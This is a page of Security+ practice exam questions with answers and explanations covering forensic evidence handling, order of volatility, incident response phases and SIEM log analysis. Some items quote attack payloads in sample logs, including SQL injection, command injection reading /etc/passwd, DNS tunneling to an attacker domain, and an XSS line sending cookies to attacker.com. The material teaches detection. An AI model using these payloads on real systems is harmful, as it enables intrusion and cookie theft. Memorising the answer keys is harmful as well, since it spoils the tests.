Security Operations

627 soru

Soru 141Soru

A forensic analyst receives a bit-stream disk image of a compromised virtual domain controller from an external incident response team. Prior to initiating analysis, the analyst calculates a SHA-256 hash of the evidence file and discovers that it does not match the SHA-256 hash value documented on the accompanying chain of custody form. Which of the following describes the most appropriate immediate course of action for the analyst to take?

Cevabı ve açıklamayı göster

Cevap: Document the hash discrepancy on the chain of custody log and halt analysis on the copy until the integrity discrepancy is investigated, as the evidence is legally inadmissible in its current state.

Cevap

Document the hash discrepancy on the chain of custody log and halt analysis on the copy until the integrity discrepancy is investigated, as the evidence is legally inadmissible in its current state.
In digital forensics, a cryptographic hash (such as SHA-256) serves as a digital fingerprint verifying that an evidence copy remains an exact bit-stream duplicate of the original source. If the computed hash does not match the hash logged at acquisition, the integrity of the evidence has been compromised. The investigator must document the discrepancy in the chain of custody record and refrain from analyzing the corrupted copy until the baseline can be verified against master image copies.

Adım Adım Çözüm

1
Verify cryptographic integrity baseline
Discovered SHA-256 hash mismatch between received disk image and chain of custody documentation.
Cryptographic hashes verify that forensic images are bit-for-bit identical to the acquired evidence.
2
Apply forensic evidence handling rules
Recognize potential evidence contamination, corruption, or improper transfer handling.
A hash mismatch proves the evidence file was altered after the baseline hash was recorded.
3
Execute chain of custody protocol
Log the discrepancy immediately and suspend analysis on the compromised file pending source verification.
Preserves forensic soundness and prevents downstream analysis of corrupted or invalid evidence.

Anahtar Kavram

Cryptographic Hash Verification and Chain of Custody Integrity
Soru 142Soru

A security specialist investigates an automated alert triggered in a Security Information and Event Management (SIEM) dashboard. The alert aggregates logs from the web application firewall (WAF) and the database audit logger as shown below:

[2026-07-27T14:02:11Z] WAF_LOG: Src=203.0.113.84 URI="/search.php?item=1%27%20OR%201=1--" Action=ALLOWED HTTP_Status=200
[2026-07-27T14:02:15Z] DB_AUDIT: User=app_web Query="SELECT * FROM items WHERE item_id = '1' OR 1=1--" Execution_Status=SUCCESS RowsReturned=84200
[2026-07-27T14:02:18Z] SIEM_CORRELATION: RuleID=RL-4092 Trigger="High Volume Data Read Post WAF Anomaly"

Based on these correlated log entries, which of the following security events is actively occurring?

Cevabı ve açıklamayı göster

Cevap: A successful SQL Injection (SQLi) attack that bypassed web application filtering and resulted in unauthorized data retrieval.

Cevap

A successful SQL Injection (SQLi) attack that bypassed web application filtering and resulted in unauthorized data retrieval.
The correct answer identifies a successful SQL Injection attack. The WAF log captures the URI parameter containing the classic SQL syntax injection `1' OR 1=1--`. The database audit log demonstrates that the input was passed un-sanitized into the SQL query statement, evaluating `1=1` to true for all rows and returning 84,200 database records.

Adım Adım Çözüm

1
Analyze the WAF log payload
The HTTP request contains the URL parameter `item=1' OR 1=1--`, which utilizes SQL metacharacters (`'` and `--`) to alter database query syntax.
Recognizing attack signatures in web logs is necessary to determine the threat vector.
2
Examine the DB Audit log entry
The web application account executed `SELECT * FROM items WHERE item_id = '1' OR 1=1--` and returned 84,200 records.
Verifying database logs confirms whether the injected payload reached the backend and executed successfully.
3
Correlate event timeline and SIEM rule trigger
The SIEM successfully correlated the WAF payload with the subsequent bulk database read, confirming an active SQL injection data exfiltration attempt.
Correlating timestamped logs across heterogeneous systems allows analysts to validate true positive incidents.

Anahtar Kavram

Log Analysis and SIEM Event Correlation
Tahmini Süre:1m 30s
Soru 143Soru

A security analyst is investigating a high-priority correlation alert in a Security Information and Event Management (SIEM) dashboard. The analyst reviews the following sequential event logs collected from a Web Application Firewall (WAF), an Nginx web server, and a Linux host kernel audit subsystem (auditd):

text
[2026-07-27T14:22:01.104Z] WAF-ALERT rule_id=942100 severity=CRITICAL client_ip=198.51.100.44 uri="/api/v1/export?format=pdf&cmd=id" action=DETECTED_ONLY
[2026-07-27T14:22:01.108Z] HTTP-ACCESS client_ip=198.51.100.44 status=200 method=GET uri="/api/v1/export?format=pdf&cmd=%3B%20cat%20%2Fetc%2Fpasswd" bytes=4096
[2026-07-27T14:22:01.112Z] AUDITD type=EXECVE pid=88412 ppid=1420 (www-data) comm="sh" args="sh -c cat /etc/passwd"

Based on the provided log telemetry, which of the following conclusions and remediation requirements are correct? (Select TWO.)

Geçerli olan tümünü seçin

Cevabı ve açıklamayı göster

Cevap: The Web Application Firewall was operating in a non-blocking inspection mode, allowing the command injection payload to reach the backend web server.; The attacker successfully executed arbitrary OS commands under the context of the unprivileged web service account (www-data).

Cevap

The WAF was operating in detection-only mode, permitting the payload to pass, and the attacker successfully achieved remote OS command execution as the web service user.
Analyzing the log timestamps and fields reveals two key findings: First, the WAF log displays action=DETECTED_ONLY, meaning the WAF alerted on the threat signature but did not drop or reset the TCP connection. Second, the host system audit log (auditd EXECVE) confirms that the web application executed a shell command ('sh -c cat /etc/passwd') under the privileges of the web service account ('www-data').

Adım Adım Çözüm

1
Analyze the WAF log entry for enforcement action and alert triggers.
Rule 942100 triggered a critical severity alert for client IP 198.51.100.44, but the action was logged as DETECTED_ONLY rather than BLOCKED.
Determines whether perimeter filtering inline controls prevented the malicious request.
2
Analyze the HTTP web server access log for response status and payload content.
The server returned HTTP status 200 OK with 4096 response bytes for a URI containing URL-encoded shell parameters (%3B%20cat%20%2Fetc%2Fpasswd).
Confirms the backend application accepted the HTTP request and processed it successfully.
3
Correlate host system audit logs (auditd) using process telemetry and timestamps.
Four milliseconds after the HTTP request, auditd logged an EXECVE execution event of 'sh -c cat /etc/passwd' originating from parent process ID 1420 owned by the 'www-data' service account.
Confirms root cause and successful execution of OS command injection on the host OS.

Anahtar Kavram

SIEM Correlation of WAF, Web, and Host Logs for Command Injection
Soru 144Soru

During an incident response investigation involving a compromised enterprise database server suspected of running an in-memory fileless payload, a forensic team must preserve digital evidence for potential judicial proceedings. Which of the following procedures should the team perform FIRST to adhere strictly to the order of volatility?

Cevabı ve açıklamayı göster

Cevap: Capture the contents of volatile system memory to external forensic media.

Cevap

Capturing the contents of volatile system memory to external forensic media must be performed first.
Capturing the contents of volatile system memory to external forensic media is the correct action because system RAM ranks higher in the order of volatility than persistent disk drives. In-memory payloads and volatile system states (such as active network sockets and running processes) are completely lost if the system is powered off or modified prior to acquisition.

Adım Adım Çözüm

1
Identify the data sources present on the target server and categorize them by volatility level.
System RAM contains highly volatile evidence (in-memory malware, network connections, encryption keys), while solid-state and hard disk drives contain non-volatile persistent evidence.
Forensic evidence acquisition must prioritize sources that are lost most rapidly when system state changes.
2
Apply the standard forensic Order of Volatility principles.
System RAM and CPU registers/cache precede persistent storage media such as hard drives and network shares.
Adhering to the RFC 3227 order of volatility ensures the preservation of transient artifacts before taking actions that alter system memory.
3
Execute memory dump procedures prior to powering off or taking disk images.
Volatile artifacts are saved to isolated, sanitized external media with integrity hashes logged.
This preserves the in-memory fileless payload without inadvertently wiping system memory during a power cycle or disk capture.

Anahtar Kavram

Order of Volatility in Digital Forensics
Tahmini Süre:1m 15s
Soru 145Soru

A security analyst is reviewing Linux authentication log entries forwarded to a SIEM aggregator from host server1:

Jul 27 14:10:01 server1 sshd[1042]: Failed password for root from 198.51.100.45 port 49210 ssh2
Jul 27 14:10:03 server1 sshd[1044]: Failed password for root from 198.51.100.45 port 49212 ssh2
Jul 27 14:10:05 server1 sshd[1046]: Failed password for root from 198.51.100.45 port 49215 ssh2
Jul 27 14:10:08 server1 sshd[1049]: Accepted password for root from 198.51.100.45 port 49218 ssh2

Based on these log entries, which TWO of the following conclusions can be accurately drawn regarding this security event? (Select TWO)

Geçerli olan tümünü seçin

Cevabı ve açıklamayı göster

Cevap: An SSH brute-force authentication attack was executed from IP address 198.51.100.45.; The attacker successfully authenticated and gained system access as the root user.

Cevap

The logs demonstrate an SSH brute-force password attack from IP address 198.51.100.45 that ultimately resulted in a successful authentication compromise of the root user.
The sequence of rapid password failures followed by an accepted password entry confirms both an SSH brute-force attempt from IP address 198.51.100.45 and a successful account compromise of the root user.

Adım Adım Çözüm

1
Inspect the failure pattern in the SSH service log stream.
Identified three consecutive password failure messages from source IP 198.51.100.45 within a seven-second window targeting root.
Rapid sequential failed login attempts from a single IP address indicate an SSH password brute-force attack.
2
Examine the final log line in the sequence.
Observed 'Accepted password for root from 198.51.100.45'.
An 'Accepted password' entry confirms that the authentication mechanism validated the password, indicating a compromised account.

Anahtar Kavram

Log Analysis and SIEM Management
Soru 146Soru

A security investigator is tasked with preserving digital evidence from a workstation suspected of being involved in unauthorized file transfers. Which of the following procedures must the investigator follow to ensure evidence integrity and maintain a legally defensible chain of custody? (Select TWO.)

Geçerli olan tümünü seçin

Cevabı ve açıklamayı göster

Cevap: Calculate and log cryptographic hash values of the storage media immediately upon acquisition and after creating an image.; Record every transfer of evidence, including dates, times, handler identities, and transfer purposes on a standardized form.

Cevap

The investigator must calculate cryptographic hash values to verify data integrity and maintain a complete log of evidence transfers, timestamps, and handlers to preserve the chain of custody.
Computing cryptographic hashes guarantees that the bit-stream copy exactly matches the source media at the point of acquisition. Documenting all evidence handlers, timestamps, and transfer reasons provides proof of possession and prevents claims of evidence tampering.

Adım Adım Çözüm

1
Perform bit-stream imaging and compute cryptographic hashes.
Establishes a baseline mathematical proof (integrity verification) showing that the forensic copy is identical to the original target disk.
Any alteration to the drive contents changes the resulting hash value, making post-acquisition hashing necessary to prove data was uncorrupted.
2
Complete and continuously update the chain of custody documentation.
Establishes an unbroken record showing who handled the evidence, when it was transferred, and where it was securely stored.
Without continuous documentation of control and possession, digital evidence can be ruled inadmissible in legal proceedings.

Anahtar Kavram

Evidence Preservation and Chain of Custody Maintenance
Soru 147Soru

A security analyst captures an image of a hard drive from a compromised workstation during an active incident. Which of the following should the analyst perform immediately after acquiring the disk image to prove that the evidence remains unaltered?

Cevabı ve açıklamayı göster

Cevap: Calculate and record a cryptographic hash of the original drive and the created image.

Cevap

Calculating and recording cryptographic hashes of both the original media and the disk image establishes evidence integrity.
Computing cryptographic hash values immediately after drive acquisition generates a unique mathematical fingerprint of the source and target image. Matching hashes demonstrate that the forensic copy is bit-for-bit identical to the source and has not been altered.

Adım Adım Çözüm

1
Identify the primary requirement for maintaining evidence integrity in digital forensics.
Digital evidence must be verifiable as an exact, uncorrupted replica of the source data.
Forensic proof in legal proceedings requires demonstrating that evidence was not modified during or after acquisition.
2
Select the cryptographic mechanism used to verify file and disk image integrity.
Cryptographic hashing algorithms (e.g., SHA-256) create unique fixed-length digests of data.
Matching hash values between the source drive and forensic copy confirm identical data content without altering the evidence.

Anahtar Kavram

Cryptographic Hashing for Evidence Integrity
Soru 148Soru

Security Information and Event Management (SIEM) systems aggregate and correlate raw telemetry from heterogeneous operating systems and network devices. Match each raw security log entry snippet to the specific security attack vector or operational event type it indicates.

Soldaki öğeye tıklayın, sonra eşleşen sağdaki öğeye tıklayın

Öğeler

192.168.1.104 - - [27/Jul/2026:14:22:10 +0000] "GET /products.php?id=10+UNION+SELECT+1,username,password_hash+FROM+users-- HTTP/1.1" 200 4521
Jul 27 14:23:15 auth-srv sshd[14209]: Failed password for invalid user root from 198.51.100.42 port 49152 ssh2 (repeated 120 times in 30s)
2026-07-27 14:24:02 DST_IP=10.0.4.15 SRC_IP=192.168.1.50 PROTO=DNS QUERY=a666b61726b6574696e67.exfil.attacker-domain.com TYPE=TXT BYTES_OUT=4096
EventID: 4672, SubjectUserSid: S-1-5-21-397955417-626881126-188441444-1105, Privileges: SeDebugPrivilege, SeTcbPrivilege, SeImpersonatePrivilege

Eşleşmeler

Cevabı ve açıklamayı göster

Cevap

Each log snippet corresponds to its distinct event pattern: web access logs containing SQL syntax match SQL Injection exfiltration; rapid daemon SSH failures match SSH authentication brute-force; oversized TXT DNS queries with subdomains match DNS tunneling; and Windows Event ID 4672 with administrative privileges matches Windows sensitive privilege assignment.
Security event telemetry is categorized by analyzing protocol identifiers, signature payloads, and event codes. Web server logs containing SQL operators represent SQL Injection. Syslog authentication logs recording high-frequency failures represent SSH brute-force attacks. DNS logs displaying encoded subdomains and large TXT outputs represent DNS tunneling exfiltration. Windows Security Event ID 4672 specifically identifies administrative user privilege assignments upon session establishment.

Adım Adım Çözüm

1
Analyze web server HTTP access log parameter syntax
Identified 'UNION SELECT' operators in the query parameters as an active SQL Injection exfiltration attempt
The attacker forces the database to evaluate structural SQL commands and join user credential tables into the response
2
Analyze Linux Syslog sshd authentication events
Identified repeated failed password events (120 attempts within 30 seconds) as an SSH brute-force attack
Automated authentication tools rapidly attempt candidate credentials against exposed remote access interfaces
3
Analyze network protocol log showing DNS query details
Identified encoded subdomain strings inside TXT record queries carrying large data payloads as DNS tunneling
Malicious software encapsulates data inside DNS queries to bypass standard web proxy and firewall filtering
4
Analyze Windows Security Event log ID and privilege list
Identified Event ID 4672 alongside SeDebugPrivilege assignment as Windows sensitive privilege assignment
Windows Security Auditing generates Event ID 4672 whenever elevated privileges are attached to a newly created security token

Anahtar Kavram

Log signature identification and SIEM telemetry classification across heterogeneous enterprise security controls
Soru 149Soru

A security analyst is reviewing web server access logs aggregated by a central SIEM platform. The log inspection view displays the following entry:

`192.168.4.12 - - [27/Jul/2026:10:15:32 +0000] "GET /search.php?q=<script>document.location='http://attacker.com/steal.php?cookie='+document.cookie</script> HTTP/1.1" 200 4520`

Based on the payload contained in this log entry, which security threat is taking place?

Cevabı ve açıklamayı göster

Cevap: Cross-Site Scripting (XSS) attack attempting to hijack client session cookies

Cevap

Cross-Site Scripting (XSS) attack attempting to hijack client session cookies
The correct answer identifies Cross-Site Scripting (XSS). The log snippet clearly shows an HTTP GET request carrying client-side JavaScript (`<script>document.location=...</script>`) in the query parameter `q`. This script accesses the victim's session cookie via `document.cookie` and attempts to send it to an external server (`attacker.com`).

Adım Adım Çözüm

1
Examine the HTTP request string in the web access log entry.
Identified the query parameter value: `q=<script>document.location='http://attacker.com/steal.php?cookie='+document.cookie</script>`.
Log payloads reveal the exact input sent from the client machine to the web application.
2
Analyze the construct of the injected payload.
The string contains client-side JavaScript wrapped inside HTML `<script>` elements designed to access `document.cookie`.
Scripts that access client-side browser DOM properties and send them to an external location characterize Cross-Site Scripting.
3
Select the option that matches the identified threat payload.
Confirmed the event represents a Cross-Site Scripting (XSS) attack targeting session cookies.
XSS exploits trust in a web application to execute arbitrary script code in a victim's browser.

Anahtar Kavram

Log Analysis and Web Attack Pattern Identification
Soru 150Soru

A digital forensics analyst must collect evidence from a powered-on virtual machine host following an active intrusion. In what sequence should the analyst capture the following evidence sources, starting from the most volatile to the least volatile?

Öğeleri doğru sıraya koymak için sürükleyin

Cevabı ve açıklamayı göster

Cevap

The correct sequence from most volatile to least volatile is: CPU registers and CPU cache memory, followed by System RAM, Swap space and paging files, Local persistent disk storage, and finally Offsite archival tape backups.
Order of Volatility dictates collecting evidence in sequence of how quickly data is lost or altered. The order moves from CPU registers/cache (microsecond volatility), to system RAM (volatile RAM state), swap/pagefiles (temporary disk storage), local persistent disks (non-volatile system storage), and finally offsite archival backups (static offline storage).

Adım Adım Çözüm

1
Identify the volatility level of CPU-internal components.
CPU registers and cache are placed first because data is overwritten almost instantaneously.
According to RFC 3227 standards for order of volatility, CPU registers change continuously with execution cycles and represent the highest volatility.
2
Capture physical system memory (RAM).
System RAM is extracted immediately after CPU cache before system power down or state changes.
RAM contains live processes, active network connections, and encryption keys that disappear when powered off.
3
Acquire temporary disk-backed memory artifacts.
Swap space and pagefiles are collected third.
Swap/paging files reside on disk but hold temporary memory structures vulnerable to kernel reallocation.
4
Perform bit-stream imaging of persistent local drives.
Local SSD/HDD persistent storage is imaged fourth.
Persistent disk data remains intact across reboots and is less volatile than system memory.
5
Retrieve long-term backup archives.
Offsite backup tapes are logged last.
Archival media is stable, read-only/offline, and has the lowest rate of data change.

Anahtar Kavram

Order of Volatility in Digital Forensics
Soru 151Soru

An incident response analyst confirms that an on-premises virtual machine hosting a critical enterprise database is actively communicating with a known malicious external C2 server and executing an unauthorized encryption routine on local volumes. What is the immediate next step the analyst should take in accordance with standard incident response playbooks?

Cevabı ve açıklamayı göster

Cevap: Isolate the virtual machine from the network segment while maintaining system power to preserve volatile memory artifacts.

Cevap

Isolate the virtual machine from the network segment while maintaining system power to preserve volatile memory artifacts.
Under standard incident response lifecycle frameworks, containment is the mandatory immediate phase once an active threat is identified. Isolating the virtual machine at the network layer stops command-and-control communications and prevents lateral movement across the enterprise network. Maintaining system power ensures volatile memory (RAM) is preserved for forensic collection.

Adım Adım Çözüm

1
Identify the active incident response phase
The incident is actively occurring with active malicious beaconing and volume encryption.
Active threats require immediate containment under NIST SP 800-61 guidelines.
2
Perform host containment while preserving forensic evidence
Disconnect network access to the virtual machine without turning off power.
Network isolation prevents lateral movement and exfiltration while preserving volatile RAM data.
3
Defer eradication and recovery until containment is complete
Avoid premature restoration or host destruction.
Executing eradication or recovery while active C2 sessions exist leads to re-compromise.

Anahtar Kavram

Incident Response Lifecycle Phase Order and Host Isolation
Soru 152Soru

During a routine security audit of a branch facility, automated network telemetry alerts the security team to an unrecognized hardware tap connected to an unmonitored wall jack in a visitor conference room. The device is actively establishing an outbound covert encrypted tunnel to an external command-and-control server while performing stealthy ARP scanning across the local corporate subnet. According to standard incident response playbooks, which of the following actions should the incident response team take FIRST during the containment phase? (Select TWO.)

Geçerli olan tümünü seçin

Cevabı ve açıklamayı göster

Cevap: Administratively disable the specific network switch port connected to the conference room wall jack to halt active lateral scanning and C2 traffic.; Capture volatile network traffic samples and memory artifacts from the active connection prior to physically disconnecting or powering down the device.

Cevap

The incident response team should administratively disable the specific switch port linked to the unauthorized device and capture volatile memory and network traffic artifacts before physically disconnecting the hardware.
Targeted containment of an active hardware threat requires immediate isolation of its network interface (disabling the switch port) to halt C2 activity and lateral movement, combined with non-destructive volatile evidence capture (network traffic and memory dumps) prior to physical device intervention.

Adım Adım Çözüm

1
Isolate the compromised network segment at the access layer switch
The rogue device's network access is severed, stopping command-and-control communications and internal scanning.
Immediate containment minimizes damage and prevents threat propagation without impacting unrelated network infrastructure.
2
Preserve volatile network traffic and memory state evidence
Transient forensic evidence remains intact for forensic examination.
Disconnecting power prematurely wipes volatile RAM state and active connection tables needed to investigate the scope of compromise.

Anahtar Kavram

Incident Response Containment Strategy & Evidence Preservation
Soru 153Soru

A cybersecurity responder is acquiring digital evidence from a running Linux enterprise server suspected of executing an in-memory malware payload. Adhering strictly to the Order of Volatility (RFC 3227), in what order should the responder capture the following evidence components from most volatile to least volatile?

Öğeleri doğru sıraya koymak için sürükleyin

Cevabı ve açıklamayı göster

Cevap

The correct sequence from most volatile to least volatile is: Processor cache memory and CPU registers, followed by System RAM and active kernel process tables, Swap space and temporary file systems (/tmp), Local solid-state drive (SSD) persistent storage, and finally Archived remote log repositories and cloud backups.
According to RFC 3227 evidence collection guidelines, forensic data must be gathered starting from the shortest lifespan to the longest lifespan to prevent evidence destruction. CPU registers and cache fluctuate constantly and are lost first. Main memory (RAM) contains volatile active state data. Swap space and temporary directories exist on storage controllers but undergo constant churn. Local persistent drives preserve non-volatile disk blocks across power events. Remote log repositories and backups are offsite and immutable, sitting at the bottom of the volatility hierarchy.

Adım Adım Çözüm

1
Identify the highest volatility layer in system hardware.
Processor cache memory and CPU registers are placed first.
Registers and CPU cache operate at system clock speed and lose contents immediately upon state changes or interruption.
2
Identify active dynamic system memory components.
System RAM and kernel process tables are placed second.
System RAM holds transient runtime structures, active network connections, and decrypted payloads that disappear when power is removed.
3
Identify transient disk storage structures.
Swap space and temporary file systems are placed third.
Paging files and temporary directories are stored on disk but are heavily modified during normal system activity.
4
Identify persistent local storage media.
Local solid-state drive (SSD) persistent storage is placed fourth.
Local disk storage maintains data without active electrical power and persists across system reboots.
5
Identify offsite and immutable archival sources.
Archived remote log repositories and cloud backups are placed fifth.
Centralized logs and remote backups are insulated from local system changes and represent stable long-term evidence.

Anahtar Kavram

Order of Volatility in Digital Forensics
Soru 154Soru

During an insider threat investigation, a security analyst physically disconnects a target workstation's secondary storage drive to perform forensic acquisition. Before connecting the drive to the analysis workstation to capture a bit-stream image, which of the following steps should the analyst take to prevent accidental modification of metadata or timestamps?

Cevabı ve açıklamayı göster

Cevap: Attach the target drive to a hardware write-blocker prior to connecting it to the forensic workstation.

Cevap

Attaching the target drive to a hardware write-blocker prior to connecting it to the forensic workstation is the essential first step to preserve evidence integrity.
Connecting the storage device through a dedicated hardware write-blocker ensures that all write requests issued by the forensic station's operating system are physically intercepted and blocked. This prevents any alteration of access times, file metadata, or sector data, maintaining the cryptographic integrity of the original media.

Adım Adım Çözüm

1
Identify the risk of connecting raw storage media to an analysis workstation.
Recognize that standard operating systems automatically modify disk volume metadata, journal logs, and access timestamps upon mounting.
Host OS automatic background writes taint digital evidence unless explicitly blocked.
2
Select the appropriate forensic control to block hardware write operations.
Utilize a hardware write-blocker between the suspect storage drive and the forensic analysis station.
Hardware write-blockers intercept read-write signaling at the controller interface, guaranteeing read-only access regardless of host OS behavior.
3
Proceed with forensic acquisition and verification.
Generate bit-stream disk images and compute verification hash values safely without altering original evidence.
Ensures forensic admissibility in legal and regulatory proceedings.

Anahtar Kavram

Forensic Write-Blocking and Evidence Preservation
Soru 155Soru

A security analyst monitoring a Security Information and Event Management (SIEM) dashboard receives an alert showing an internal web application server actively executing unauthorized PowerShell scripts launched via a web shell. The web shell was uploaded through a newly exploited file upload vulnerability. According to standard incident response playbooks, which of the following should be the analyst's immediate next action?

Cevabı ve açıklamayı göster

Cevap: Disconnect the affected web server from the network segment while maintaining host power.

Cevap

Disconnect the affected web server from the network segment while maintaining host power.
In accordance with standard NIST/ISO incident response frameworks, once an active compromise is confirmed, the immediate priority is containment. Isolating the server from the network stops active command-and-control channels and lateral movement while keeping the system powered on to preserve volatile RAM evidence for forensic capture.

Adım Adım Çözüm

1
Identify the current incident response phase based on the scenario.
An active compromise (web shell executing unauthorized commands) is verified, requiring immediate containment.
Containment limits the scope of damage and prevents the attacker from escalating privileges or moving laterally.
2
Select the appropriate containment technique that preserves forensic evidence.
Network isolation detaches the host from the corporate network without powering off the machine.
Maintaining system power ensures volatile data stored in RAM remains available for digital forensics.

Anahtar Kavram

Incident Response Lifecycle - Containment Phase
Soru 156Soru

A security analyst is executing an incident response playbook following the detection of an unauthorized rogue wireless access point connected to an enterprise network switch. According to the NIST Incident Response Framework (NIST SP 800-61 Rev. 2), in what chronological order should the analyst perform the response actions below?

Öğeleri doğru sıraya koymak için sürükleyin

Cevabı ve açıklamayı göster

Cevap

The correct sequence follows the NIST Incident Response lifecycle: 1) Validate the alert via WIPS logs (Detection & Analysis), 2) Disable the switch port (Containment), 3) Physically remove the rogue access point and configure 802.1X (Eradication & Recovery), and 4) Hold a post-incident review meeting (Post-Incident Activity).
The standard incident response framework dictates four major sequential phases: Detection and Analysis, Containment, Eradication and Recovery, and Post-Incident Activity. The response begins by validating the alert through WIPS log analysis to confirm the threat. Next, the switch port is disabled to contain network traffic and limit potential compromise. Following containment, the physical rogue device is eradicated and port security controls are applied for recovery. Finally, post-incident activities occur to document lessons learned and update operational playbooks.

Adım Adım Çözüm

1
Execute Detection and Analysis
The incident is verified as a true positive rogue access point.
Initial analysis confirms the scope and validity of the threat before initiating containment.
2
Execute Containment
Network access for the unauthorized device is terminated at the switch layer.
Immediate containment limits exposure and prevents attacker lateral movement or eavesdropping.
3
Execute Eradication and Recovery
The physical device is removed and port security controls are reinforced.
Eradication removes the unauthorized artifact and recovery ensures the infrastructure returns to a secure baseline.
4
Execute Post-Incident Activity
Incident details are documented and response playbooks are refined.
Lessons learned activities occur post-mitigation to institutionalize improvements for future incidents.

Anahtar Kavram

NIST Incident Response Lifecycle (NIST SP 800-61 Rev. 2)
Tahmini Süre:1m 30s
Soru 157Soru

A security analyst is investigating an unalerted data breach involving an e-commerce platform. The SIEM correlated the following log snippets from the Web Application Firewall (WAF) and database server:

[WAF_LOG] 2026-07-27T14:22:10Z | src=198.51.100.45 | uri=/catalog.php?cat_id=5%20UNION%20SELECT%20usr,pwd_hash%20FROM%20admin-- | action=PASS | status=200
[DB_LOG] 2026-07-27T14:22:11Z | user=db_web_app | query="SELECT * FROM items WHERE cat_id=5 UNION SELECT usr,pwd_hash FROM admin--" | status=SUCCESS | rows_returned=4500

Based on these log entries, which of the following best describes the attack vector and the appropriate SIEM correlation enhancement required to detect future attempts?

Cevabı ve açıklamayı göster

Cevap: A SQL injection attack successfully extracted database credentials; the SIEM correlation rule should be updated to trigger an alert when a WAF HTTP 200 response coincides with an anomalous spike in database rows returned.

Cevap

A SQL injection attack successfully extracted database credentials; the SIEM correlation rule should be updated to trigger an alert when a WAF HTTP 200 response coincides with an anomalous spike in database rows returned.
The log entries exhibit a classic SQL injection payload ('UNION SELECT usr,pwd_hash FROM admin--') that passed through the WAF and executed against the underlying database server, returning 4,500 records. Enhancing SIEM correlation rules to link successful web HTTP responses containing SQL manipulation patterns with abnormally high backend database row return counts provides effective detection for successful application-layer exfiltration.

Adım Adım Çözüm

1
Analyze the WAF log payload string
The parameter value '/catalog.php?cat_id=5 UNION SELECT usr,pwd_hash FROM admin--' contains SQL syntax intended to append database query commands.
Identifying SQL syntax structure confirms the attack is a SQL Injection (SQLi) attack.
2
Correlate WAF response with Database audit log
The WAF passed the request (action=PASS, status=200), and the database executed it successfully, returning 4,500 rows.
This confirms successful database data extraction despite WAF inspection.
3
Determine SIEM rule modification
Correlating successful HTTP status codes (200 OK) containing SQL input structures with high row count returns from the database backend effectively detects successful SQLi exfiltration.
Traditional single-event rules failed because WAF passed the traffic; multi-source correlation across web and DB logs bridges the detection gap.

Anahtar Kavram

Log Correlation across Web Firewall and Database Logs for SQL Injection Detection
Tahmini Süre:2m 0s
Soru 158Soru

During an operational shift, a security analyst receives a high-fidelity alert indicating that an internal database server containing confidential HR records has established an active session with an external command-and-control (C2) server via encrypted DNS over HTTPS (DoH) tunnels. Memory analysis confirms an active process executing malicious commands, but lateral movement to adjacent servers has not yet been observed. According to standard incident response lifecycle guidelines (such as NIST SP 800-61), which action should the analyst perform FIRST?

Cevabı ve açıklamayı göster

Cevap: Isolate the compromised database server from the network segment to halt C2 communications while preserving system volatility for forensic examination.

Cevap

Isolate the compromised database server from the network segment to halt C2 communications while preserving system volatility for forensic examination.
According to standard incident response frameworks (NIST SP 800-61), once an active compromise with command-and-control communication is confirmed during detection/analysis, the immediate next step is Containment. Network isolation of the compromised host stops data exfiltration and lateral movement while preserving volatile memory for digital forensics.

Adım Adım Çözüm

1
Identify the current phase of the Incident Response lifecycle.
The incident has been detected and triaged; the active C2 session indicates an ongoing security breach.
Once an active breach is confirmed, containment must immediately take precedence to prevent data exfiltration and lateral movement.
2
Select the action that aligns with the Containment phase of NIST SP 800-61.
Network isolation detaches the system from internal and external networks while maintaining volatile RAM state.
Containment limits the blast radius of the attack prior to initiating eradication or recovery procedures.
3
Evaluate alternative responses to verify correct phase sequencing.
Re-imaging, live process removal, and network-wide logging adjustments represent out-of-order phase actions or ineffective control applications.
Eradication and recovery steps performed prematurely undermine incident containment and evidence preservation.

Anahtar Kavram

Incident Response Lifecycle Containment Phase
Soru 159Soru

During a routine operational monitoring check, a system administrator confirms that a workstation in the assembly plant was infected with malware after a user inserted an unauthorized flash drive. The incident response team has just validated the active incident. According to standard NIST/ISO incident response frameworks, which action should the responder execute FIRST during the containment phase?

Cevabı ve açıklamayı göster

Cevap: Disconnect the infected workstation from the network segment to isolate the device.

Cevap

Disconnect the infected workstation from the network segment to isolate the device.
In standard incident response playbooks, the immediate priority upon confirming a malware infection is containment. Disconnecting the affected host isolates the endpoint and prevents lateral propagation across adjacent network resources.

Adım Adım Çözüm

1
Determine the current phase in the incident response lifecycle.
The incident has just been confirmed, placing the team at the beginning of the Containment phase.
Containment limits the scope of impact before permanent remediation steps are undertaken.
2
Identify the primary containment objective for an infected host.
Network isolation prevents lateral movement and external command-and-control activity.
Stopping malware spread takes precedence over eradication, recovery, or post-incident review.

Anahtar Kavram

Incident Response Process and Playbooks
Soru 160Soru

Place the core phases of the NIST SP 800-61 Incident Response Lifecycle in the correct sequential order from first to last.

Öğeleri doğru sıraya koymak için sürükleyin

Cevabı ve açıklamayı göster

Cevap

The correct order of the NIST Incident Response Lifecycle phases is Preparation, Detection and Analysis, Containment, Eradication, and Recovery, and Post-Incident Activity.
The standard NIST SP 800-61 incident response framework follows a logical four-stage lifecycle. It begins with Preparation to establish capabilities, moves to Detection and Analysis to uncover and assess security events, continues to Containment, Eradication, and Recovery to mitigate and recover from the threat, and concludes with Post-Incident Activity to analyze lessons learned.

Adım Adım Çözüm

1
Identify the foundation step required before any attack occurs.
Preparation is established first to equip the team with training and resources.
Without preparation, an organization cannot effectively detect or respond to security threats.
2
Determine the step that follows once operational monitoring begins.
Detection and Analysis comes second to identify security events and validate incidents.
An incident must be detected and analyzed before any mitigation measures can be applied.
3
Identify the active response phase after confirming an incident.
Containment, Eradication, and Recovery takes place third.
Once an incident is identified, responders work to stop threat propagation, eliminate the malware or malicious artifacts, and restore systems.
4
Identify the final phase following system restoration.
Post-Incident Activity concludes the lifecycle.
After operations return to normal, documenting lessons learned ensures continuous improvement of the security posture.

Anahtar Kavram

NIST SP 800-61 Incident Response Lifecycle Phases
ÖncekiSayfa 8 / 32Sonraki
Security Operations Alıştırma Soruları — CompTIA Security+ — Sayfa 8 | Examkin